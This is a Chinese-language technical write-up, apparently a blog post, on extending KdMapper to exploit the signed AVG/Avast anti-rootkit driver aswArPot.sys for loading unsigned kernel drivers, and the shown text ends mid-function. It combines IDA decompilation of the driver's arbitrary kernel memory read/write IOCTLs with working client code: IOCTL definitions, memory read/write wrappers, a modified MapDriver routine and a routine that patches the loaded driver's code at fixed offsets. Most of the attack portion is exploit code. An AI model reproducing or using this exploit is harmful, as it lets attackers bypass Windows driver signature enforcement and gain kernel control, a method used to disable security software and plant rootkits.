KdMapper扩展实现之AVG(aswArPot.sys)

1.背景

  KdMapper是一个利用intel的驱动漏洞可以无痕的加载未经签名的驱动，本文是利用其它漏洞（参考《【转载】利用签名驱动漏洞加载未签名驱动》）做相应的修改以实现类似功能。需要大家对KdMapper的代码有一定了解。

2.驱动信息

3.IDA分析

3.1 入口函数：

NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
        _security_init_cookie();
        return InitializeDriver(DriverObject, RegistryPath);
}
 
__int64 __fastcall InitializeDriver(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
        __int64 retaddr; // [rsp+0h] [rbp+0h]
 
        qword_14004D9A8 = retaddr;
        return InitializeDriverImpletementation(DriverObject, RegistryPath);
}
 
__int64 __fastcall InitializeDriverImpletementation(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
  ULONG MajorVersion; // [rsp+28h] [rbp-E0h] BYREF
  ULONG MinorVersion[3]; // [rsp+2Ch] [rbp-DCh] BYREF
  struct _OSVERSIONINFOW VersionInformation; // [rsp+38h] [rbp-D0h] BYREF
 
  PsGetVersion(&MajorVersion, MinorVersion, &BuildNumber, 0i64);
  dword_14002A214 = MinorVersion[0] | (MajorVersion << 8);
  if ( (unsigned int)dword_14002A214 < 0x501 )
    return 3221225473i64;
  strcpy((char *)&dword_14002A308, "201111");
  VersionInformation.dwOSVersionInfoSize = 276;
  if ( RtlGetVersion(&VersionInformation) >= 0
    && (VersionInformation.dwMajorVersion > 6
     || VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion >= 2) )
  {
    PoolType = 512;
    dword_1400289B8 = 0x40000000;
  }
  sub_140020AB4(RegistryPath);
  sub_140020BA0(RegistryPath);
  CreateAvarDevice(DriverObject);
  sub_140015AF8();
  if ( !(unsigned int)CreateDevice(DriverObject) )
    sub_140020FA8();
  return 0i64;
}

3.2 创建设备和符号链接

__int64 __fastcall CreateDevice(struct _DRIVER_OBJECT *pDriverObject)
{
  const wchar_t *szArPotDeviceName; // rdi
  __int64 result; // rax
  NTSTATUS ntStatus; // edi
  _UNICODE_STRING DestinationString; // [rsp+50h] [rbp-28h] BYREF
  _UNICODE_STRING SymbolicLinkName; // [rsp+60h] [rbp-18h] BYREF
 
  DriverObject = pDriverObject;
  szArPotDeviceName = L"aswSP_ArPot2";
  if ( !g_bAswDevice )
    szArPotDeviceName = L"avgSP_ArPot2";
  _snwprintf(g_szArPotDeviceNameBuffer, 0x1Eui64, L"\\Device\\%s", szArPotDeviceName);
  _snwprintf(g_szArPotSymbolicLinkNameBuffer, 0x1Eui64, L"\\DosDevices\\%s", szArPotDeviceName);
  RtlInitUnicodeString(&DestinationString, g_szArPotDeviceNameBuffer);
  RtlInitUnicodeString(&SymbolicLinkName, g_szArPotSymbolicLinkNameBuffer);
  result = IoCreateDeviceSecure(
             pDriverObject,
             0,
             &DestinationString,
             0x7299u,
             256,
             1,
             (PUNICODE_STRING)L"68",
             0i64,
             &DeviceObject);
  if ( (int)result >= 0 )
  {
    ntStatus = IoCreateSymbolicLink(&SymbolicLinkName, &DestinationString);
    if ( ntStatus >= 0 )
    {
      memset64(pDriverObject->MajorFunction, (unsigned __int64)MainDispatch, 0x1Cui64);
      result = 0i64;
    }
    else
    {
      IoDeleteDevice(DeviceObject);
      result = (unsigned int)ntStatus;
    }
  }
  return result;
}
 
__int64 __fastcall CreateAvarDevice(PDRIVER_OBJECT pDriverObject)
{
  __int64 result; // rax
  const wchar_t *szAvarDeviceName; // r9
  __int64 v4; // rcx
  __int16 v5; // ax
  __int64 v6; // rcx
  __int16 v7; // ax
  __int64 v8; // rcx
  __int16 v9; // ax
  __int64 v10; // rcx
  char v11; // al
  ULONG MajorVersion; // [rsp+58h] [rbp-89h] BYREF
  ULONG MinorVersion; // [rsp+5Ch] [rbp-85h] BYREF
  _UNICODE_STRING DestinationString; // [rsp+60h] [rbp-81h] BYREF
  _UNICODE_STRING SymbolicLinkName; // [rsp+70h] [rbp-71h] BYREF
  char v16[16]; // [rsp+80h] [rbp-61h] BYREF
  int v17[6]; // [rsp+90h] [rbp-51h]
  __int16 v18; // [rsp+A8h] [rbp-39h]
  int v19[8]; // [rsp+B0h] [rbp-31h]
  __int16 v20; // [rsp+D0h] [rbp-11h]
  int v21[9]; // [rsp+D8h] [rbp-9h]
  __int16 v22; // [rsp+FCh] [rbp+1Bh]
 
  g_AvarDeviceObject = 0i64;
  PsGetVersion(&MajorVersion, &MinorVersion, &g_OsBuildNumber, 0i64);
  nOsVersion = MinorVersion | (MajorVersion << 8);
  if ( (unsigned int)nOsVersion < 0x500 )
    return 0xC0000001i64;
  szAvarDeviceName = L"aswSP_Avar";
  if ( !g_bAswDevice )
    szAvarDeviceName = L"avgSP_Avar";
  g_szAvarDeviceName = (__int64)szAvarDeviceName;
  _snwprintf(g_szAvarDeviceNameBuffer, 0x1Eui64, L"\\Device\\%s");
  _snwprintf(g_szAvarSymbolicLinkNameBuffer, 0x1Eui64, L"\\DosDevices\\%s", g_szAvarDeviceName);
  RtlInitUnicodeString(&DestinationString, g_szAvarDeviceNameBuffer);
  RtlInitUnicodeString(&SymbolicLinkName, g_szAvarSymbolicLinkNameBuffer);
  result = IoCreateDeviceSecure(
             pDriverObject,
             0,
             &DestinationString,
             0x9988u,
             256,
             0,
             (PUNICODE_STRING)L"68",
             0i64,
             &g_AvarDevice);
  g_ntStatus = result;
  if ( (int)result >= 0 )
  {
    g_ntStatus = IoCreateSymbolicLink(&SymbolicLinkName, &DestinationString);
    if ( g_ntStatus >= 0 )
    {
      g_AvarDeviceObject = g_AvarDevice;
      v4 = 0i64;
      v19[0] = 'F\0\\';
      v19[1] = 7077993;
      v19[2] = 7536741;
      v19[3] = 7536761;
      v19[4] = 6619252;
      v19[5] = 6029421;
      v19[6] = 7602254;
      v19[7] = 7536742;
      v20 = 0;
      v17[0] = 4456540;
      v17[1] = 6881394;
      v17[2] = 6619254;
      v17[3] = 6029426;
      v17[4] = 6881348;
      v17[5] = 7012467;
      v18 = 0;
      v21[0] = 7274569;
      v21[1] = 4391014;
      v21[2] = 7143535;
      v21[3] = 7078000;
      v21[4] = 7602277;
      v21[5] = 5374053;
      v21[6] = 7405669;
      v21[7] = 6619253;
      v21[8] = 7602291;
      v22 = 0;
      strcpy(v16, "CLASSPNP.SYS");
      do
      {
        v5 = *(_WORD *)((char *)v19 + v4);
        *(_WORD *)(v4 + 0x14004D040i64) = v5;
        v4 += 2i64;
      }
      while ( v5 );
      v6 = 0i64;
      do
      {
        v7 = *(_WORD *)((char *)v17 + v6);
        *(_WORD *)(v6 + 0x14004D120i64) = v7;
        v6 += 2i64;
      }
      while ( v7 );
      v8 = 0i64;
      do
      {
        v9 = *(_WORD *)((char *)v21 + v8);
        *(_WORD *)(v8 + 0x14004D3A0i64) = v9;
        v8 += 2i64;
      }
      while ( v9 );
      v10 = 0i64;
      do
      {
        v11 = v16[v10];
        *(_BYTE *)(v10 + 0x14004D380i64) = v11;
        ++v10;
      }
      while ( v11 );
      stru_14004D0E0.Count = 1;
      qword_1400289D8 = (__int64)&qword_1400289D0;
      qword_1400289D0 = &qword_1400289D0;
      stru_14004D0E0.Owner = 0i64;
      stru_14004D0E0.Contention = 0;
      KeInitializeEvent(&stru_14004D0E0.Event, SynchronizationEvent, 0);
      sub_140019CB4();
      sub_14001C130();
      qword_14004CF40 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _DWORD, _DWORD, _DWORD, _DWORD, _QWORD, _DWORD, _DWORD, _QWORD, _DWORD, _QWORD))sub_14001C7F8(L"IoCreateFileSpecifyDeviceObjectHint");
      qword_14004CD60 = sub_14001C7F8(L"IofCallDriver");
      sub_14001C7F8(L"IofCompleteRequest");
      sub_14001A24C();
      sub_14001FC24();
      result = 0i64;
    }
    else
    {
      IoDeleteDevice(g_AvarDevice);
      result = (unsigned int)g_ntStatus;
    }
  }
  return result;
}

  创建设备有两个，需要分析的是 CreateAvarDevice，其创建的设备名是 aswSP_Avar 或 avgSP_Avar，实际中根据驱动安装逻辑创建的是 avgSP_Avar。

3.3 MainDispatch

NTSTATUS __fastcall MainDispatch(struct _DEVICE_OBJECT* pDeviceObject, IRP* pIrp)
{
        struct _DEVICE_OBJECT* pRequestDeviceObject; // rbx
        pRequestDeviceObject = pDeviceObject;
        ......    
 
        if (g_AvarDeviceObject && pDeviceObject == g_AvarDeviceObject)
        {
                if (pIrp->RequestorMode)
                {
                        if (!pIrp->Tail.Overlay.CurrentStackLocation->MajorFunction)
                        {
                                if (CheckAvarDeviceIoControlProcess)
                                {
                                        v18 = IoGetRequestorProcessId(pIrp);
                                        if (!(unsigned __int8)CheckAvarDeviceIoControlProcess(v18))
                                        {
                                        LABEL_17:
                                                pIrp->IoStatus.Status = 0xC00000BB;
                                                IofCompleteRequest(pIrp, 0);
                                                return 0xC00000BB;
                                        }
                                }
                        }
                }
                result = AvarDeviceMainDispatch((__int64)pRequestDeviceObject, pIrp);
        }
        else
        {
                ......
        }
        return result;
}
 
__int64 __fastcall AvarDeviceMainDispatch(PDEVICE_OBJECT pDeviceObject, IRP* pIrp)
{
        _IO_STACK_LOCATION* pIosp; // rcx
        IO_STATUS_BLOCK* pIoStatus; // r11
        unsigned int ntStatus; // edi
        PVOID pInputBuffer; // rdx
        PVOID pOutputBuffer; // r9
        __int64 nInputBufferLength; // r8
        int nIoControlCode; // er10
 
        pIosp = pIrp->Tail.Overlay.CurrentStackLocation;
        pIoStatus = &pIrp->IoStatus;
        ntStatus = 0;
        pIrp->IoStatus.Information = 0i64;
        pInputBuffer = pIrp->AssociatedIrp.SystemBuffer;
        pIoStatus->Status = 0;
        pOutputBuffer = pInputBuffer;
        nInputBufferLength = pIosp->Parameters.DeviceIoControl.InputBufferLength;
        nIoControlCode = pIosp->Parameters.DeviceIoControl.IoControlCode;
        if (pIosp->MajorFunction == 2)
        {
                sub_140019B60(pIosp, pInputBuffer, nInputBufferLength, pInputBuffer);
                sub_140017CF8(&dword_14004D440);
        }
        else if (pIosp->MajorFunction == 14)
        {
                if ((nIoControlCode & 3) == 3)
                        pOutputBuffer = pIrp->UserBuffer;
                ntStatus = AvarDeviceIoControl(
                        pIosp->FileObject,
                        pInputBuffer,
                        nInputBufferLength,
                        pOutputBuffer,
                        pIosp->Parameters.DeviceIoControl.OutputBufferLength,
                        nIoControlCode,
                        pIoStatus,
                        pDeviceObject);
        }
        IofCompleteRequest(pIrp, 0);
        return ntStatus;
}
 
__int64 __fastcall AvarDeviceIoControl(PFILE_OBJECT pFileObject, PVOID pInputBuffer, unsigned int nInputBufferLength, PVOID pOutputBuffer, unsigned int nOutputBufferLength, int nIoControlCode, IO_STATUS_BLOCK* pIoStatus, PDEVICE_OBJECT pDeviceObject)
{
        ......
        NTSTATUS ntStatusV44; // eax
 
        if (nIoControlCode != 0x9988C044)
        {
                ......
                switch (nIoControlCode)
                {
                        ......
                        default:
                                ntStatusV44 = AvarDefaultDeviceIoControl(
                                        pFileObject,
                                        (ASWARPOT_COPY_MEMORY_INFO*)pInputBuffer,
                                        nInputBufferLength,
                                        pOutputBuffer,
                                        nOutputBufferLength,
                                        nIoControlCode,
                                        pIoStatus);
                                goto LABEL_215;
                }
                ntStatusV44 = 0xC0000206;
                goto LABEL_215;
        }
 
        return result;
}
 
__int64 __fastcall AvarDefaultDeviceIoControl(PFILE_OBJECT pFileObject, ASWARPOT_COPY_MEMORY_INFO* pInputBuffer, unsigned int nInputBufferLength, PVOID pOutputBuffer, ULONG nOutputBufferLength, int nIoControlCode, IO_STATUS_BLOCK* pIoStatus)
{
        size_t nInputBufferLengthV8; // r13
        _OWORD* nOutputBufferV9; // r15
        PVOID P[4]; // [rsp+50h] [rbp-378h] BYREF
 
 
        P[2] = pInputBuffer;
        nInputBufferLengthV8 = nInputBufferLength;
        nOutputBufferV9 = pOutputBuffer;
        P[3] = pOutputBuffer;
        P[1] = pIoStatus;
        LODWORD(P[0]) = 0;
        
        if (nIoControlCode != 0x9989C020)
        {
                switch (nIoControlCode)
                {
                        ......
                        case 0x9989C028:
                                if (nInputBufferLength < 8 || !pInputBuffer)// 读取内存
                                {
                                        result = 0xC0000206i64;
                                        pIoStatus->Status = 0xC0000206;
                                        return result;
                                }
                                if (nOutputBufferLength < 4 || !pOutputBuffer)
                                {
                                        result = 0xC0000206i64;
                                        pIoStatus->Status = 0xC0000206;
                                        return result;
                                }
                                P[0] = pInputBuffer->ReadSourceAddress;
                                if (MmIsAddressValid(P[0]) && MmIsAddressValid((char*)P[0] + nOutputBufferLength))
                                {
                                        CopyMemoryWithSourceMdl(nOutputBufferV9, P[0], nOutputBufferLength);
                                        pIoStatus->Information = nOutputBufferLength;
                                        pIoStatus->Status = 0;
                                        return 0i64;
                                }
                                pIoStatus->Status = 0xC000000D;
                                break;
                        case 0x9989C034:
                                if (nInputBufferLength >= 0x18 && pInputBuffer)// 写入内存
                                {
                                        if (MmIsAddressValid(pInputBuffer->DestinationAddress)
                                                && MmIsAddressValid((char*)pInputBuffer->DestinationAddress + pInputBuffer->Size))// 这里应该是 + pInputBuffer->Size -1
                                        {
                                                CopyMemoryWithDestinaionMdl(pInputBuffer->DestinationAddress, pInputBuffer->Buffer, pInputBuffer->Size);
                                                pIoStatus->Status = 0;
                                                pIoStatus->Information = 0i64;
                                                result = 0i64;
                                        }
                                        else
                                        {
                                                result = 0xC000000Di64;
                                                pIoStatus->Status = 0xC000000D;
                                                pIoStatus->Information = 0i64;
                                        }
                                }
                                else
                                {
                                        result = 0xC0000206i64;
                                        pIoStatus->Status = 0xC0000206;
                                }
                                return result;
                        case 0x9989C02C:
                                ......
                        }
                return sub_1400182E8(
                        (__int64)pFileObject,
                        (unsigned int*)pInputBuffer,
                        nInputBufferLengthV8,
                        nOutputBufferV9,
                        nOutputBufferLength,
                        nIoControlCode,
                        pIoStatus);
        }
       
        return result;
}

  其中 0x9989C028 是读取内存，0x9989C034为写入内存。

  代码第 132 行内容为   if (nOutputBufferLength < 4 || !pOutputBuffer)，此处限制每次读取的大小为一个 ULONG，如果读取的字节数小于 4 个字节需要转换一下，参见《4.1 读取内存限制》。

  代码第 152 行为 MmIsAddressValid((char*)pInputBuffer->DestinationAddress + pInputBuffer->Size)，这里应该为 MmIsAddressValid((char*)pInputBuffer->DestinationAddress + pInputBuffer->Size-1)，前者的逻辑使用期间会超出指定的地址范围，如果范围之外的内存页是无效的话就会导致验证失败。相关修改参见《4.2 写入内存地址范围验证》。

 3.4 CopyMemoryWithSourceMdl

__int64 __fastcall CopyMemoryWithSourceMdl(PVOID DestinationAddress, void* SourceAddress, ULONG nSize)
{
        char bLockedPages; // si
        PMDL pMDL; // rax
        _MDL* pMdl2; // rdi
        PVOID pMappedAddress; // r14
        unsigned int ntSatus; // ebx
        KIRQL oldSpinLock; // bl
        KSPIN_LOCK SpinLock[6]; // [rsp+38h] [rbp-30h] BYREF
 
        bLockedPages = 0;
        pMDL = IoAllocateMdl(SourceAddress, nSize, 0, 0, 0i64);
        pMdl2 = pMDL;
        SpinLock[1] = (KSPIN_LOCK)pMDL;
        if (!pMDL)
                return 0xC000009Ai64;
        if ((pMDL->MdlFlags & 7) == 0)
        {
                MmProbeAndLockPages(pMDL, 0, IoModifyAccess);
                bLockedPages = 1;
        }
        pMappedAddress = MmMapLockedPagesSpecifyCache(pMdl2, 0, MmCached, 0i64, 0, dword_1400289B8 | 0x10u);
        if (pMappedAddress)
        {
                SpinLock[0] = 0i64;
                oldSpinLock = KeAcquireSpinLockRaiseToDpc(SpinLock);
                memmove(DestinationAddress, pMappedAddress, nSize);
                KeReleaseSpinLock(SpinLock, oldSpinLock);
                ntSatus = 0;
                MmUnmapLockedPages(pMappedAddress, pMdl2);
        }
        else
        {
                ntSatus = 0xC000009A;
        }
        if (bLockedPages)
                MmUnlockPages(pMdl2);
        IoFreeMdl(pMdl2);
        return ntSatus;
}

   其中第 19 行为 MmProbeAndLockPages(pMDL, 0, IoModifyAccess)， 第三个参数应应该为 IoReadAceess，否则在映射不可写内存时会导致失败。相关修改参见《4.3 锁定页面参数修改》。

3.5 CopyMemoryWithDestinaionMdl

__int64 __fastcall CopyMemoryWithDestinaionMdl(void* DestinationAddress, PVOID SourceAddress, ULONG nSize)
{
        char bLockedPages; // si
        PMDL pMdl; // rax
        _MDL* pMdlMapped; // rdi
        PVOID pMappedAddress; // r14
        unsigned int ntStatus; // ebx
        KIRQL oldSpinLock; // bl
        KSPIN_LOCK SpinLock[6]; // [rsp+38h] [rbp-30h] BYREF
 
        bLockedPages = 0;
        pMdl = IoAllocateMdl(DestinationAddress, nSize, 0, 0, 0i64);
        pMdlMapped = pMdl;
        SpinLock[1] = (KSPIN_LOCK)pMdl;
        if (!pMdl)
                return 0xC000009Ai64;
        if ((pMdl->MdlFlags & 7) == 0)
        {
                MmProbeAndLockPages(pMdl, 0, IoModifyAccess);
                bLockedPages = 1;
        }
        pMappedAddress = MmMapLockedPagesSpecifyCache(pMdlMapped, 0, MmCached, 0i64, 0, dword_1400289B8 | 0x10u);
        if (pMappedAddress)
        {
                SpinLock[0] = 0i64;
                oldSpinLock = KeAcquireSpinLockRaiseToDpc(SpinLock);
                memmove(pMappedAddress, SourceAddress, nSize);
                KeReleaseSpinLock(SpinLock, oldSpinLock);
                ntStatus = 0;
                MmUnmapLockedPages(pMappedAddress, pMdlMapped);
        }
        else
        {
                ntStatus = 0xC000009A;
        }
        if (bLockedPages)
                MmUnlockPages(pMdlMapped);
        IoFreeMdl(pMdlMapped);
        return ntStatus;
}

   其中第 19 行为 MmProbeAndLockPages(pMDL, 0, IoModifyAccess)， 第三个参数应应该为 IoReadAceess，否则在映射不可写内存时会导致失败。相关修改参见《4.3 锁定页面参数修改》。

3.6 _ASWARPOT_COPY_MEMORY_INFO结构体

00000000 _ASWARPOT_COPY_MEMORY_INFO struc ; (sizeof=0x18, align=0x8, copyof_400)
00000000 ReadSourceAddress dq ?                  ; offset
00000008 DestinationAddress dq ?                 ; offset
00000010 Size            dd ?
00000014 Buffer          db 4 dup(?)
00000018 _ASWARPOT_COPY_MEMORY_INFO ends

4.相关逻辑分析及修改

4.1 读取内存限制

  在《3.3 MainDispatch》代码第 132 行内容为   if (nOutputBufferLength < 4 || !pOutputBuffer)，此处限制每次读取的大小为一个 ULONG，如果读取的字节数小于 4 个字节需要转换一下，

  实现代码如下：

#define ASWARPOT_DEVICE_TYPE          (DWORD)0x9989
#define ASWARPOT_READ_MEMORY_FUNCID   (DWORD)0x300A
#define IOCTL_ASWARPOT_READ_MEMORY      \
    CTL_CODE(ASWARPOT_DEVICE_TYPE, ASWARPOT_READ_MEMORY_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9989C028
 
typedef struct _ASWARPOT_COPY_MEMORY_INFO
{
    PVOID ReadSourceAddress;
    PVOID DestinationAddress;
    ULONG Size;
    BYTE  Buffer[4];
}ASWARPOT_COPY_MEMORY_INFO, *PASWARPOT_COPY_MEMORY_INFO;
 
bool avg_driver::ReadMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size) {
 
        ASWARPOT_COPY_MEMORY_INFO info = { 0 };
        bool bResult = false;
        info.ReadSourceAddress = (PVOID)address;
        ULONG ulData = 0;
        if (size < 4)
        {
                bResult = SuperCallDriver(device_handle, IOCTL_ASWARPOT_READ_MEMORY, &info, sizeof(info), &ulData, 4);
                if (!bResult)
                {
                        Log(L"[-] ReadMemory 1 failed\r\n");
                }
                else
                {
                        RtlCopyMemory(buffer, &ulData, size);
                }
 
        }
        else
        {
                bResult = SuperCallDriver(device_handle, IOCTL_ASWARPOT_READ_MEMORY, &info, sizeof(info), buffer, size);
                if (!bResult)
                {
                        Log(L"[-] ReadMemory 2 failed\r\n");
                }
        }
 
        return bResult;
}

4.2 写入内存地址范围验证

  在《3.3 MainDispatch》代码第 152 行为 MmIsAddressValid((char*)pInputBuffer->DestinationAddress + pInputBuffer->Size)，这里应该为 MmIsAddressValid((char*)pInputBuffer->DestinationAddress + pInputBuffer->Size-1)，前者的逻辑使用期间会超出指定的地址范围，如果范围之外的内存页是无效的话就会导致验证失败。

  实际使用过程中要我们分配目标驱动内存并写入数据时会导致验证失败，这时我们可以将分配的内存扩大，实际复制数据时使用原始大小，修改后的相关代码如下：

uint64_t kdmapper::MapDriver(HANDLE iqvw64e_device_handle, BYTE* data, ULONG64 param1, ULONG64 param2, bool free, bool destroyHeader, bool mdlMode, bool PassAllocationAddressAsFirstParam, mapCallback callback, NTSTATUS* exitCode) 
{
    ......
    void* local_image_base = VirtualAlloc(nullptr, image_size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
	if (!local_image_base)
		return 0;
 
	DWORD TotalVirtualHeaderSize = (IMAGE_FIRST_SECTION(nt_headers))->VirtualAddress;
	image_size = image_size - (destroyHeader ? TotalVirtualHeaderSize : 0);
 
	uint64_t kernel_image_base = 0;
	uint64_t mdlptr = 0;
	//因为校验时的边界设置错误，故分配时的大小加一个页面，使用时按原大小
	if (mdlMode) {
		
		kernel_image_base = AllocMdlMemory(iqvw64e_device_handle, image_size + 0x1000, &mdlptr);
	}
	else {
		kernel_image_base = avg_driver::AllocatePool(iqvw64e_device_handle, nt::POOL_TYPE::NonPagedPool, image_size+0x1000);
	}
    ......
}

4.3 锁定页面参数修改

  在《3.4 CopyMemoryWithSourceMdl》和《3.5 CopyMemoryWithDestinaionMdl》 中 MmProbeAndLockPages 第三个参数为 IoModifyAccess，即 2，这样会导致映射不可写内存页面时失败，应该改为IoReadAccess，也即为 0。其实在之后调用 MmMapLockedPagesSpecifyCache 后，内存已经变为可读可写了，之前的 MmProbeAndLockPages 第三个参数为 IoReadAccess就可以了。 

4.3.1 CopyMemoryWithSourceMdl 修改 

  IDA 定位如下：

.text:000000014001DD97                         loc_14001DD97:                          ; DATA XREF: .rdata:0000000140027550↓o
.text:000000014001DD97 33 D2                                   xor     edx, edx        ; AccessMode
.text:000000014001DD99 44 8D 42 02                             lea     r8d, [rdx+2]
.text:000000014001DD9D 48 8B CF                                mov     rcx, rdi        ; MemoryDescriptorList
.text:000000014001DDA0 FF 15 BA 62 00 00                       call    cs:MmProbeAndLockPages

  可以修改 lea r8d, [rdx+2] 为  lea r8d, [rdx] 即可，即使将 000000014001DD99 处的机器码修改为 44 80 42 00，也即将 000000014001DD9C 对应的字节改为 0。 

  000000014001DD9C 处对应的的虚拟地址偏移量可用 StudyPE 查询，如下：

  

  即驱动基址加 0x1DD9C 处字节修改为0。

4.3.2 CopyMemoryWithDestinaionMdl 修改

  IDA 定位如下：

.text:000000014001DEB3                         loc_14001DEB3:                          ; DATA XREF: .rdata:000000014002757C↓o
.text:000000014001DEB3 33 D2                                   xor     edx, edx        ; AccessMode
.text:000000014001DEB5 44 8D 42 02                             lea     r8d, [rdx+2]    ; Operation
.text:000000014001DEB9 48 8B CF                                mov     rcx, rdi        ; MemoryDescriptorList
.text:000000014001DEBC FF 15 9E 61 00 00                       call    cs:MmProbeAndLockPages

  可以修改 lea r8d, [rdx+2] 为  lea r8d, [rdx] 即可，即使将 000000014001DEB5 处的机器码修改为 44 80 42 00，也即将 000000014001DEB8 对应的字节改为 0。 

  000000014001DEB8 处对应的的虚拟地址偏移量可用 StudyPE 查询，如下：

  

  即驱动基址加 0x1DEB8 处字节修改为0。

4.3.3 相关代码

#define READ_PROBE_AND_LOCK_PAGES_OPERATION_OFFSET      (0x1dd9c)
#define WRITE_PROBE_AND_LOCK_PAGES_OPERATION_OFFSET      (0x1deb8)
 
bool avg_driver::PatchDriver(HANDLE device_handle)
{
        BYTE byData = 0;
        uint64_t driverBase = utils::GetKernelModuleAddress(driver_name);
 
        if (driverBase == 0) {
                Log(L"[-] Failed to get driver:" << driver_name << std::endl);
                avg_driver::Unload(device_handle);
                return false;
        }
        //将对应读写内存 MmProbeAndLockPages(pMdl, 0, IoModifyAccess); 第三个参数改为 IoReadAccess
        uint64_t patchReadAddress = driverBase + READ_PROBE_AND_LOCK_PAGES_OPERATION_OFFSET;
        if (!WriteMemory(device_handle, patchReadAddress, &byData, 1))
        {
                Log(L"[-] Failed to Write Memory In Patch Driver 1" << std::endl);
                avg_driver::Unload(device_handle);
                return false;
        }
 
        uint64_t patchWriteAddress = driverBase + WRITE_PROBE_AND_LOCK_PAGES_OPERATION_OFFSET;
        if (!WriteMemory(device_handle, patchWriteAddress, &byData, 1))
        {
                Log(L"[-] Failed to Write Memory In Patch Driver 2" << std::endl);
                avg_driver::Unload(device_handle);
                return false;
        }
        Log(L"[+] PatchDriver OK!\r\n");
        return true;
}

5.完整关键代码

  头文件

#define ASWARPOT_DEVICE_TYPE          (DWORD)0x9989
#define ASWARPOT_READ_MEMORY_FUNCID   (DWORD)0x300A
#define ASWARPOT_WRITE_MEMORY_FUNCID (DWORD)0x300D
 
#define IOCTL_ASWARPOT_READ_MEMORY      \
    CTL_CODE(ASWARPOT_DEVICE_TYPE, ASWARPOT_READ_MEMORY_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9989C028
#define IOCTL_ASWARPOT_WRITE_MEMORY    \
    CTL_CODE(ASWARPOT_DEVICE_TYPE, ASWARPOT_WRITE_MEMORY_FUNCID, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9989C034
 
#define READ_PROBE_AND_LOCK_PAGES_OPERATION_OFFSET      (0x1dd9c)
#define WRITE_PROBE_AND_LOCK_PAGES_OPERATION_OFFSET      (0x1deb8)
 
typedef struct _ASWARPOT_COPY_MEMORY_INFO
        {
                PVOID ReadSourceAddress;
                PVOID DestinationAddress;
                ULONG Size;
                BYTE  Buffer[4];
        }ASWARPOT_COPY_MEMORY_INFO, *PASWARPOT_COPY_MEMORY_INFO;

  CPP文件

NTSTATUS avg_driver::SuperCallDriverEx(
        _In_ HANDLE DeviceHandle,
        _In_ ULONG IoControlCode,
        _In_ PVOID InputBuffer,
        _In_ ULONG InputBufferLength,
        _In_opt_ PVOID OutputBuffer,
        _In_opt_ ULONG OutputBufferLength,
        _Out_opt_ PIO_STATUS_BLOCK IoStatus)
{
        IO_STATUS_BLOCK ioStatus;
 
        NTSTATUS ntStatus = NtDeviceIoControlFile(DeviceHandle,
                NULL,
                NULL,
                NULL,
                &ioStatus,
                IoControlCode,
                InputBuffer,
                InputBufferLength,
                OutputBuffer,
                OutputBufferLength);
 
        if (ntStatus == STATUS_PENDING) {
 
                ntStatus = NtWaitForSingleObject(DeviceHandle,
                        FALSE,
                        NULL);
        }
 
        if (IoStatus)
                *IoStatus = ioStatus;
        if (!NT_SUCCESS(ntStatus))
        {
                Log(L"[-] SuperCallDriverEx failed, code:0x" << std::setbase(16) << std::setw(8) << std::setfill(L'0') << ntStatus << std::endl);
        }
        return ntStatus;
}
 
 
BOOL avg_driver::SuperCallDriver(
        _In_ HANDLE DeviceHandle,
        _In_ ULONG IoControlCode,
        _In_ PVOID InputBuffer,
        _In_ ULONG InputBufferLength,
        _In_opt_ PVOID OutputBuffer,
        _In_opt_ ULONG OutputBufferLength)
{
        BOOL bResult;
        IO_STATUS_BLOCK ioStatus;
 
        NTSTATUS ntStatus = SuperCallDriverEx(
                DeviceHandle,
                IoControlCode,
                InputBuffer,
                InputBufferLength,
                OutputBuffer,
                OutputBufferLength,
                &ioStatus);
 
        bResult = NT_SUCCESS(ntStatus);
        SetLastError(RtlNtStatusToDosError(ntStatus));
        return bResult;
}
 
bool avg_driver::ReadMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size) {
 
        ASWARPOT_COPY_MEMORY_INFO info = { 0 };
        bool bResult = false;
        info.ReadSourceAddress = (PVOID)address;
        ULONG ulData = 0;
        if (size < 4)
        {
                bResult = SuperCallDriver(device_handle, IOCTL_ASWARPOT_READ_MEMORY, &info, sizeof(info), &ulData, 4);
                if (!bResult)
                {
                        Log(L"[-] ReadMemory 1 failed\r\n");
                }
                else
                {
                        RtlCopyMemory(buffer, &ulData, size);
                }
 
        }
        else
        {
                bResult = SuperCallDriver(device_handle, IOCTL_ASWARPOT_READ_MEMORY, &info, sizeof(info), buffer, size);
                if (!bResult)
                {
                        Log(L"[-] ReadMemory 2 failed\r\n");
                }
        }
 
        return bResult;
}
 
bool avg_driver::WriteMemory(HANDLE device_handle, uint64_t address, void* buffer, uint64_t size) {
 
        ULONG ulSize = sizeof(ASWARPOT_COPY_MEMORY_INFO) + size;
        PASWARPOT_COPY_MEMORY_INFO pInfo = (PASWARPOT_COPY_MEMORY_INFO)malloc(ulSize);
        if (!pInfo)
        {
                Log(L"[-]WriteMemory malloc failed\r\n");
                return false;
        }
        RtlZeroMemory(pInfo, ulSize);
        pInfo->DestinationAddress = (PVOID)address;
        pInfo->Size = size;
        RtlCopyMemory(&pInfo->Buffer, buffer, size);
 
        bool bResult = SuperCallDriver(device_handle, IOCTL_ASWARPOT_WRITE_MEMORY, pInfo, ulSize, NULL, NULL);
        free(pInfo);
        if (!bResult)
        {
                Log(L"[-] WriteMemory failed\r\n");
        }
        return bResult;
}
 
bool avg_driver::WriteToReadOnlyMemory(HANDLE device_handle, uint64_t address, void* buffer, uint32_t size) {
        if (!address || !buffer || !size)
                return false;
 
 
        bool result = WriteMemory(device_handle, address, buffer, size);
 
        return result;
}
 
bool avg_driver::PatchDriver(HANDLE device_handle)
{
        BYTE byData = 0;
        uint64_t driverBase = utils::GetKernelModuleAddress(driver_name);
 
        if (driverBase == 0) {
                Log(L"[-] Failed to get driver:" << driver_name << std::endl);
                avg_driver::Unload(device_handle);
                return false;
        }
        //将对应读写内存 MmProbeAndLockPages(pMdl, 0, IoModifyAccess); 第三个参数改为 IoReadAccess
